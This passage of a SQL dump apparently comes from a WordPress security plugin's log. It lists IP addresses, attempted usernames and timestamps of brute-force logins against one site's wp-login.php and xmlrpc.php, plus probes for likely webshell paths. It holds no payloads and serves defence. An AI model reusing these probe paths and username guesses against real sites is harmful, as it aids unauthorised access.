2852,152,'IbAEHqX9zdGOv5iJRrNgQMuK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('78.47.46.81',1311714897,'newd',0,1664891051.9646,152,'EAvFnfmHcDiG6kJXzYxNZWoq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.134.248.192',1535572160,'newd',0,1664891048.6409,152,'Bg0xkCS2T8D5zO3Fw6ye4aoE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.255.131.28',3120530204,'newd',0,1664891043.4134,152,'meR40YkjW68oKXrlNwaSyCfP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('78.47.46.81',1311714897,'newd',0,1664891041.9929,152,'fCo3eSqWria8BMQywLJdU2Nk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.66.145.163',2487390627,'newd',0,1664891041.9039,152,'TpsKmc15teXPRaGC4YSAF0gZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.116.156',3451483292,'newd',0,1664890957.4478,7,'eJQnwSAifzj8NH4OlUGbVW0D','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.219.13',1736629005,'admin',0,1664890604.3302,51,'9kF5JYrShjq27H1Cwu8QcbAd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.180.18',3497112594,'admin',0,1664890593.8171,51,'NCZhxr3GavDYVyOcmu17tH4R','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.234.124',2806508156,'admin',0,1664889738.3516,51,'gMbNwtHBQX1CJiAuO3KT7mea','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('202.29.236.140',3390958732,'admin',0,1664889730.3441,51,'Bh8wxRPkSIWY4lyUvXOGru7o','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.255.81.60',872370492,'admin',0,1664888872.9913,51,'xsvHZDEeJiP8NX4CAyrdcgat','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('150.109.148.216',2523763928,'admin',0,1664888867.7955,51,'fQSJpCehVb0Rs9MWA7n2dHLc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.109.54.127',3496818303,'admin',0,1664888033.9083,51,'8Sv4zDhf7i3JaF1RmqLcEtyk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'admin',0,1664887155.3465,51,'ANDqs3Rpa6tIjfBe47rCliTZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664886778.1772,7,'kF7J3DZGguSWM6ImberRhYpE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.140',3103917196,'admin',0,1664886331.3220,152,'JgTav5bQ0XeHmApC2OfFkVid','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.241.136',2671899016,'admin',0,1664886330.2075,152,'w0uKSdi71rmICDU5N8Wl6tcE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.215.12.182',2732002486,'admin',0,1664886325.3326,152,'CaXjDEIT0QPBi4ywScfp12JU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('84.54.23.178',1412831154,'admin',0,1664886319.7233,152,'DIKCRJXpLH6dnoeFylcVW97t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.236.152.148',2917963924,'admin',0,1664886315.5448,51,'9MJKdBYkzGyxpv6DQWeHVEO0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.74.145.155',1347064219,'admin',0,1664886313.4014,152,'r98bcDahLm7w5TyYMj6GSNdk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.228.208.88',2565132376,'admin',0,1664886290.6907,51,'IWYBmCzrRPUeO0NV2EZHMjxi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.36.190',3515688126,'newd',0,1664885636.7233,7,'6MhWGHVEAjedFy1PUDbt9wgT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.236.35',3165056035,'admin',0,1664885449.7562,51,'q3VhEO06A4zBTrbodcp18tfk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.213.249.210',2731932114,'admin',0,1664885364.8609,152,'lZFHgPvhVsxbjri8WunoXU4f','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.61.12',2487762188,'admin',0,1664885360.5222,152,'2tVshe1XSHYdGjzIrl0n6JO3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.93.129',3324927361,'admin',0,1664885356.2815,152,'GWE6TD3SuKYrAMovQa21OzcC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.48.183',3328323767,'newd',0,1664885150.7035,7,'FXomDQEaV3tAwlexK5c9bS7Z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.97.183.204',392280012,'admin',0,1664884679.6289,152,'zVp9Q3xMXq7jiZ4lLAbIBDyP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.126.46',2733735470,'admin',0,1664884679.3237,152,'nPrEb8AqWLtgcMZ3FOwkhJyo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.153.64.181',2493071541,'admin',0,1664884678.7276,152,'0rvzQabFUTxLhHnsVIqYp41t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.221',1364735197,'newd',0,1664884625.6266,7,'WYkQIdHEgyFBstA48CwmL6lX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.69.8.8',2672101384,'newd',0,1664884616.9812,7,'xHW517UXSsz8njY0VKTPoQaO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.217.129.44',1608089900,'newd',0,1664883776.1397,7,'3BxPRrzvb4jCipulh5KcgLtn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.0.91',2884894811,'newd',0,1664883751.7955,7,'56k2ZhnN7oQvpmLM4D1eSOUq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.38.20.161',3257275553,'',0,1664883335.4792,55,'INmodQgvuxwOWAbPG6f8es1F','','19|0|0|0|cteisys.com/wp-content/themes/photocrati/admin/scripts/scripts-update.php',0,19,0),('157.230.15.115',2649100147,'newd',0,1664882918.5896,7,'YUwaz0JHKM4PeupFbL3DVxBc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.101.157.187',90545595,'newd',0,1664882895.8391,7,'SHa14bCEA08nxkqNBdsW25gZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.50.216',3328324312,'newd',0,1664882536.3402,7,'pe2iznYrJUBXvglc6S1ad9Kb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.127.126',2649128830,'newd',0,1664882058.9859,7,'7m3kSYeEPOQlUGDIc80K2pau','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.232.180.174',2783491246,'newd',0,1664882051.4162,7,'hAxI81LW3QGRKCkX2bp7Ptms','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.153.235',3497105899,'newd',0,1664881204.6301,7,'qFAHiI6uzUxmXVtp97KDhYOR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.232.180.174',2783491246,'newd',0,1664881196.0497,7,'j9KoxV2LWlNtSps0qhwTMu84','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('87.236.20.5',1475089413,'newd',0,1664880356.7154,7,'zb1cJrLCjRMfgZsBlOHKYmG5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.114.72.18',796018706,'newd',0,1664880341.9084,7,'yD1UdX4rOhnukL7iQ0cCYZaF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.171.103',3497110375,'admin',0,1664879509.5069,51,'ACwexNKBIOj9DTnFWUulQpf2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.154.248.39',3483039783,'admin',0,1664879486.2073,51,'U2ZSKnQAEGruJwLVzWobNmIT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.109.79.3',3496824579,'admin',0,1664879398.5115,152,'xD3zM7u8wyS04NJmP5rldno2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.136.181.65',2525541697,'admin',0,1664879394.3143,152,'vX1JqW8N0hQysRCLKSrM9xjw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.166',1364735142,'Admin',0,1664879392.7256,152,'Bcg3DUOEMVWv9enrisfy7Njz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.172.51.19',883700499,'admin',0,1664879385.0820,152,'OeNg40XxEKPbmjY1GMVJyFuL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.132.211',858162387,'admin',0,1664879384.9842,152,'if1ZUt4VgOD8wdQ6BxC9qLyK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.79.3',3496824579,'admin',0,1664879384.9786,152,'9V5loZ0yIQhrj2g8Pvuwnmpd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('75.119.135.205',1266124749,'admin',0,1664878662.6042,51,'oyx8vQGHtebWp0VjB5RY6AEq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.81.59.92',223427420,'admin',0,1664878653.2840,51,'yaE35jgUYQM047C8VGxndbuT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('68.183.93.28',1152867612,'',0,1664877934.1778,55,'qCo7GycHiBZn2KQMSmFu5EWY','','19|0|0|0|cteisys.com/wp-22.php',0,19,0),('198.46.81.7',3324924167,'admin',0,1664877764.1864,51,'pNCAhscZWQr7byEgmTS4qXH6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.244.77.192',1760841152,'newd',0,1664877216.7695,7,'LnhXfmdIScaJVuAEWM1wqlFj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.109.117',2673438069,'admin',0,1664876902.2103,51,'jcBlQoaw4PDTtRJ51y2xOgF7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.182.249.22',2478242070,'admin',0,1664876895.1926,51,'9tOa0HIR6jC81wlizVFBrT4u','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.220.143',861658255,'admin',0,1664876064.0104,51,'7M0J1uv6hFOqaDwUPlzELXfb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('173.247.248.10',2918709258,'admin',0,1664876058.2796,51,'6TFzxfuHho52rQcL9eXl3tPJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.207.63',2160578367,'newd',0,1664875903.8339,152,'L3ihraZbuvAF15xUmYBTPD8g','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.71.145',2650097553,'newd',0,1664875902.6474,152,'rjkhdn3MfDCtpKx1gvu7eaSP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.201.61.46',2328444206,'newd',0,1664875896.2101,152,'uAHIk6v8VPU4ZyQM9EjFX5Bd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.79.3',3496824579,'newd',0,1664875886.0679,152,'LfrpmGRg92dyXKU83FIwTcaP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.52.208.110',2754924654,'newd',0,1664875881.9012,152,'Jhd9xnRDGcpPLiBOA8Sa3l0k','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.82.16.112',2907836528,'newd',0,1664875875.3464,152,'6Yi4HVA9RIM7Pw1GQKqdlbh2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.249.163.48',1543086896,'admin',0,1664875231.5889,51,'5ozmkvbKHRIYLxfXtrCFpSOi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.192.104.56',599812152,'admin',0,1664875224.2770,51,'kQLvt0Uhz8SNKaMIA3CpE6gO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.55.206',3515693006,'newd',0,1664873500.8301,7,'BODZSbfzmcxQaJGv0NU7HKoC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.201.61.46',2328444206,'newd',0,1664872331.6613,152,'WVGjqiT1c4HunyE9zeUQ3psX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.79.3',3496824579,'newd',0,1664872320.4765,152,'uB1hPJvIYoTdZnl3i7CWAbqU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.201.61.46',2328444206,'newd',0,1664872320.1009,152,'O3GCuwILHNZA4zsVeXr7dpEY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.28.3.42',773587754,'newd',0,1664872310.9320,152,'z5Q8ID1G2SJRqs0nthlHjoYO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.229.185.64',1877326144,'newd',0,1664872314.7320,152,'j1OuSJxUGnAIb0TLKRfMgQqF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('210.245.90.233',3539294953,'newd',0,1664872310.2218,152,'Il4E2DHPCS8Rzr6jpqGTKWJ7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.64.60.246',222313718,'newd',0,1664872300.6784,152,'2e0c8shnwzIKUjZtu17kFGmR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.168.95',2388502623,'newd',0,1664872294.6847,152,'e9y1P3bT0JSi56f2uYHtoEKV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.41',1364735273,'newd',0,1664872294.6849,152,'3n0fsDZkMpTt7PEGyualx5dH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.74.145.155',1347064219,'newd',0,1664872294.6767,152,'17pGTkUdugQNbBY8jAEfSyiH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.49.253',3515691517,'nathaniel-lipka',0,1664870675.8512,51,'85P0eSDZvCNydLQqcbKwX9iU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.62.213.234',2990462442,'newd',0,1664870172.0138,152,'rlLJpV3YZEw9tCoIh1Fu2adj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.66.143.170',2487390122,'newd',0,1664870071.1106,152,'7iD3QhCHfU6dG4pwM1vKVRIL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('182.79.46.50',3058642482,'newd',0,1664870062.8352,152,'nU87HecNzSsx0WkRgMb1Pl6h','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.153.64.181',2493071541,'newd',0,1664870059.3788,152,'UG3YhrfMqk0K8ENP96VjTpzi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.10.82',3496806994,'newd',0,1664870053.6016,152,'lBkn9Uzs0MabVF61fO785eY2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.172.40.95',883697759,'newd',0,1664870036.5259,152,'GBMbviFP32WAejoRw68ng0zs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.251.216.88',1761335384,'newd',0,1664870032.7544,152,'LWq0KUb4uNQjg2olwcCt3kXe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('108.170.27.202',1823087562,'newd',0,1664870028.2189,152,'3z5L9WiMrF4nPNJxusVwOZbg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.210.209.68',2513621316,'newd',0,1664870028.1810,152,'UFSldkpaYKCcPZWo37jNRzqy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.226.37.184',3403818424,'newd',0,1664870028.1808,152,'zNcM9PTmejDZ1EYblgHIf40u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664865629.5319,7,'mMbCn0lRjEpdPAeOIH6wkZYz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('43.252.230.8',737994248,'newd',0,1664865584.4914,152,'4pHPMA9gxLZn3zrW1kd7lfQb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('59.106.13.177',996806065,'newd',0,1664865580.4064,152,'6JrpYiWsZ5bzjReL1VNQ0FgB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.180.175.149',1387573141,'newd',0,1664865576.4684,152,'0N4ZWgu89nmRfjxlrH5KvSDc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.161.119.55',94467895,'newd',0,1664865575.8069,152,'W0ENImJFYQCvjSldDHb49qXs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.179.81.192',884167104,'newd',0,1664865574.1300,152,'NtCmSFT497JOkupI05gWHEsh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.220.174.115',3118247539,'newd',0,1664865572.6990,152,'Xb4wqFVsaDJoeG1p3UrlQ6C9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.1.211.14',3556889358,'newd',0,1664865569.1782,152,'9zyNh74dcWgJ6wnUf3EObtqY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.208.99.2',1540383490,'newd',0,1664865566.9587,152,'OV5Gm4nPMb69asJlQpzTDojt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.62.213.234',2990462442,'newd',0,1664865566.2091,152,'yI51faqnJeTYGdwgpiLC4KQM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.178.145.187',1152553403,'newd',0,1664865562.7827,152,'tkW39njavo4gNuI75FrV2fpz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.232.14.51',3118992947,'newd',0,1664865562.6949,152,'nvZVSGPWykqJgIsrwaMQ18tf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.232.14.51',3118992947,'newd',0,1664865562.6177,152,'uXgn5NzaDVosYGepv0EryWd2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.133.214.139',1736824459,'',0,1664863451.3786,10,'9dA0fQuGVNhYL6qtXP3C8Tw7','','707|0|0|0|cteisys.com/wp-admin.php',0,707,0),('103.133.214.139',1736824459,'',0,1664863451.3759,55,'9dA0fQuGVNhYL6qtXP3C8Tw7','','19|0|0|0|cteisys.com/wp-admin.php',0,19,0),('103.133.214.139',1736824459,'',0,1664863449.9101,55,'Nosc67kxDqG2pQUwifgajrWB','','19|0|0|0|cteisys.com/xmrlpcs.php',0,19,0),('103.133.214.139',1736824459,'',0,1664863447.6995,55,'DcYBHE4xjkFwXQsMNyuhaRol','','19|0|0|0|cteisys.com/admin.php',0,19,0),('103.133.214.139',1736824459,'',0,1664863436.7310,55,'gw1LoSJb8eUXpPd6nqIMhVC9','','19|0|0|0|cteisys.com/lock.php',0,19,0),('92.205.161.6',1556979974,'Admin',0,1664860919.1749,152,'Tyr1fXJUSM0kCPduKEhB8n4O','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.66.143.170',2487390122,'admin',0,1664860912.9189,152,'XrZIkPGUKl4JABOt0Dmc8T6b','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.161.131.84',262243156,'admin',0,1664860908.9298,152,'soBYWwFItf0mGZLJie36pczh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.122.42.249',2256153337,'admin',0,1664860902.4319,152,'FsaWqG6UVfwu8XAmS9cjo2v0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('65.52.67.200',1093944264,'admin',0,1664860895.1762,152,'ZxzvmVjaqiku4y3w0PEDrnJI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.182.57.45',3115727149,'admin',0,1664860895.1755,152,'PM27aRm1VHrWcD8zsYfFXNxZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('88.208.242.172',1490088620,'admini',0,1664860895.1758,152,'3IeT5laWSFnEHX69s1whvR4P','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.48.183',3328323767,'newd',0,1664859280.5173,7,'OyLVEwuvq0rQeZ6xz7bo3cMU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('115.165.166.192',1940235968,'newd',0,1664857309.3455,152,'f9KTOdPAY372nvLcoiWMUDsq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.67.89.84',2973981012,'newd',0,1664857305.0394,152,'VLYJfmrF1TK9c0ACt6IXQGkl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.241.136',2671899016,'newd',0,1664857265.2362,152,'cdXgRZWu6iUoNOqPzI3DpMCK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.93.129',3324927361,'newd',0,1664857265.1044,152,'hJgqVRYAoTFy0QuG8w2ZsOzS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.61.232.31',3393054751,'newd',0,1664857259.5057,152,'nBSCmapxlOeF2NPMzuWh7o1K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664857257.9589,152,'IsguH3hXNWiP71dnCflm8cbL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.161.131.84',262243156,'newd',0,1664857253.1738,152,'dRfJOHMwVKmL2i9shXtpFYkP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.201.61.46',2328444206,'newd',0,1664857253.1732,152,'vmKZc7gJBOkwrbDQyFURi9xL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.132.211',858162387,'newd',0,1664857253.1728,152,'lPgb0NAfJo9rUmYWKTViu4Xa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.44.126',3515690110,'newd',0,1664856039.3078,7,'31EJhSMnPrv7Il40O6gH58jZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.56.13',3515693069,'newd',0,1664863243.7777,7,'iSQHRk8gUFMKLOYan5rzA97s','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.133.214.139',1736824459,'',0,1664863434.8850,55,'5o1jqz7H2hmSsfRUt4BpadJZ','','19|0|0|0|cteisys.com/3index.php',0,19,0),('134.122.42.249',2256153337,'newd',0,1664898497.7251,152,'eSJR0yEgKk64TOjvWDs2bNi1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.201.61.46',2328444206,'newd',0,1664898494.0132,152,'9rAjpNQk5WsauFe7yUZ23GqE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.71.145',2650097553,'newd',0,1664898492.6965,152,'cbZlYfMSJaD1usTNwCtWGVk9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.153.235',3497105899,'newd',0,1664898456.2864,7,'m0sINVQ75nGS968adoDRXOTh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.22.109.42',2769710378,'newd',0,1664898448.7067,7,'WtsYFK6uijDH4w0cUrJqBAoN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.126.219.43',3112098603,'newd',0,1664897580.8242,7,'3auDMCeftx6S4UlGvdcO7ZQq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.180.18',3497112594,'newd',0,1664897555.0173,7,'gquvklwHWtmZ6c7zFoT8frnd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.57.9',3515693321,'nathaniel-lipka',0,1664897335.5286,51,'DuLQ7HGSjchdUZOas9elpEWC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.183.39',3165042471,'newd',0,1664896707.5774,7,'pV74uCG02zYnMNUmRxOHjZ9B','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.110.251',2650107643,'newd',0,1664896683.8714,7,'5AJoV6gk3wPqf2CIOaynGvYB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.56.13',3515693069,'nathaniel-lipka',0,1664896441.7689,51,'u6PyZxBkAHwWEvD7Ueij9t8o','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.213.249.210',2731932114,'newd',0,1664895963.3028,152,'IvD7eO1yFEAqriQ0S3HfZhaR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.229.40',3488933160,'newd',0,1664895962.6285,152,'OV94SFr0w2Jv5fBe7izUIQGh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.161.119.55',94467895,'newd',0,1664895949.3892,152,'81qsLWNDrmoBZSTwy7C5Jav3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.93.129',3324927361,'newd',0,1664895948.7167,152,'grAU8TWLb0xYuRyzKpOCom5S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.28.3.42',773587754,'newd',0,1664895943.7982,152,'FVQcdbqI9u1pK3JkmDisOLXT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.28.3.42',773587754,'newd',0,1664895941.2304,152,'oNzvWRc0YEkbi4Z3hnGjUIlA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.83.165',1386566565,'newd',0,1664895941.2294,152,'trJWQF5fc7oa3ADLzbdhn8pI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('181.174.125.214',3048111574,'newd',0,1664895837.8866,7,'dbDpOtI238ufTUmX5PxqVK4R','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('27.72.145.33',457740577,'newd',0,1664895813.2429,7,'M58BXb7FOKeVZDwmUr6EScq9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('152.228.208.88',2565132376,'newd',0,1664894954.5628,7,'jsYiRyle6OgWnBMJEVoPfCqh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.90.29',2319735325,'newd',0,1664894948.0047,7,'LB5fWgrU9ZcQxENb83lPm2HF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.44.8',2649107464,'newd',0,1664894078.5496,7,'fkr4sAjQKCbuz0LMUwoG238d','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('150.136.250.229',2525559525,'newd',0,1664894072.0815,7,'sqXUSvfEIme78H1V4dMgbDLT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664893285.5136,7,'O7wiRLGSrkA9PJ285QpNhaWv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.146.18.88',1435636312,'newd',0,1664893201.6864,7,'cvBFbPgozwZiHM7GrKhIEy1q','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1664893191.7952,7,'zc1xIgtHZ4kUaKvny7bhsf2G','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.236.35',3165056035,'admin',0,1664892326.2557,51,'GQwxk5eJrhUW0XTNRDvE7CLY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.165.184.74',1386592330,'admin',0,1664892319.0348,51,'SXZqjClwkhbVxfcO8LrgN9Jo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.16.238.78',1158737486,'admin',0,1664980354.0781,152,'zpJD06cfmXoqAhGS8dLP3gkR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.150.171',1868207787,'admin',0,1664980354.7766,152,'azYeybW3q0dGskJpv6Ux9KTZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('84.39.116.180',1411871924,'joyce',0,1664989838.3542,152,'KcX36Qh49d5RSNkjvenAWFTD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'newd',0,1664997463.5402,7,'KGCyNu9FcbYtM4mQliSpnTa5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.244.77.192',1760841152,'newd',0,1665000793.5698,7,'qnhB4fz2SbI8GCLNUdwKEPe3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.168.111',2813110383,'admin',0,1665030139.5214,51,'fI7zMltbqjn8H0awvRYUchXA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.74.120.192',1732933824,'newd',0,1665029673.8620,152,'SFlpU0NfbcZv3Paqn6L52gTR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.35.193.62',2703475006,'newd',0,1665029253.7646,152,'Ra9HgVP6lZUABeKpW5xOvFTj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('180.149.241.246',3029725686,'newd',0,1665065282.0826,152,'AjUlmK4sIZhbw5P3Lzfa0xkX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.60.32',3328326688,'newd',0,1665082944.7539,7,'iCAbQSung6D9IzyalTqZf7oP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('121.243.95.160',2045992864,'newd',0,1665083487.1329,7,'RjF80txWHGmc2gSDyTrB53PU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('193.37.254.27',3240492571,'joyce',0,1665088779.4520,152,'d3j0b5YxTqoXkAvWOyBIKV1u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.184.117.52',2310567220,'newd',0,1665088306.7187,7,'nbahc70gKxTwFsieOISDuHpM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.149.154.8',1737857544,'newd',0,1665088274.4931,7,'UgHbBvLndzfKumWyiEN2O6M0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.114.185.76',1567799628,'newd',0,1665112885.0113,7,'6OYLXHxnidP7p8utbKGClgJf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.0.91',2884894811,'newd',0,1665115399.4406,7,'oCZbAGWk8zL7N4Hlnq0ySYMT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.227.162.186',1088660154,'newd',0,1665122686.7906,152,'sxOpgzoim7dnrUGjMvw8k4tu